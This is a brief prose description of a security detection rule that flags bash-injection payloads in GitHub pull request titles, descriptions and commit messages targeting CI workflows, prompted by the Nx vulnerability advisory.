The GitHub Malicious Pull Request Titles detection rule aims to identify and mitigate potential security threats through malicious patterns in pull request (PR) titles, descriptions, and commit messages. This rule focuses specifically on patterns that may indicate bash injection attempts, a prevalent attack vector that could exploit a repository's continuous integration (CI) workflows. The rule was initiated after the discovery of the Nx vulnerability (GHSA-cxm3-wv7p-598c), which highlighted risks where PR titles incorporated bash command payloads. The rule operates under the premise that malicious actors may submit PRs with titles that contain injections intended to compromise CI execution and repository integrity. It establishes specific thresholds for flagging PRs based on the presence of dangerous commands typically associated with code injection and supply chain attacks. While the detection priority remains high, PRs that do not involve cross-forking may be assessed with lower severity, acknowledging that not all PRs pose an immediate threat. The rule's effectiveness relies on analysing commits and PR metadata to pinpoint users and actions that could signify malicious intent.